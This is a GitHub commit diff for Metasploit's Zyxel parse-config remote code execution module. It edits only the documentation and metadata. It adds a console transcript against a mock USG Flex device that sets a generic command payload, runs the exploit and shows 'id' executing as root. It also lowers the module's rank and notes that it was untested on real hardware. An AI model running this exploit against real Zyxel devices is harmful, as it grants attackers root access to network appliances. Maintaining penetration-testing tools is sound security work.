File tree Expand file tree Collapse file tree 2 files changed +25
-5
lines changed
documentation/modules/exploit/linux/http
modules/exploits/linux/http Expand file tree Collapse file tree 2 files changed +25
-5
lines changed Original file line number Diff line number Diff line change @@ -21,8 +21,7 @@ Two caveats of this exploit chain were described by Jacob Baines in the followin
21
21
22
22
### Setup
23
23
24
- This module was tested against USG Flex Version (???). To test this module you will need to acquire a hardware device
25
- running one of the vulnerable firmware versions listed above.
24
+ To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.
26
25
27
26
## Options
28
27
@@ -41,5 +40,21 @@ The default value is `/tmp`
41
40
1 . Receive a Meterpreter session as the ` root ` user.
42
41
43
42
## Scenarios
44
- ### USG Flex Version (???)
45
-
43
+ ### Mock USG Flex environment
44
+ ```
45
+ msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
46
+ payload => cmd/unix/generic
47
+ msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
48
+ cmd => id
49
+ msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
50
+ AllowNoCleanup => true
51
+ msf6 exploit(linux/http/zyxel_parse_config_rce) > run
52
+
53
+ [*] Attempting to upload the payload via QSR file write...
54
+ [+] File write was successful.
55
+ [+] Command output:
56
+ uid=0(root) gid=0(root) groups=0(root)
57
+
58
+ [!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
59
+ [*] Exploit completed, but no session was created.
60
+ ```
Original file line number Diff line number Diff line change 4
4
##
5
5
6
6
class MetasploitModule < Msf ::Exploit ::Remote
7
- Rank = ExcellentRanking
7
+
8
+ Rank = NormalRanking
8
9
9
10
include Msf ::Exploit ::Remote ::HttpClient
10
11
include Msf ::Exploit ::FileDropper
@@ -18,6 +19,10 @@ def initialize(info = {})
18
19
'Description' => %q{
19
20
This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
20
21
The affected firmware versions depend on the device module, see this module's documentation for more details.
22
+
23
+ Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.
24
+ If you run into any issues testing this in a real environment we kindly ask you raise an issue in
25
+ metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose
21
26
} ,
22
27
'Author' => [
23
28
'SSD Secure Disclosure technical team' , # discovery
You can’t perform that action at this time.
0 commit comments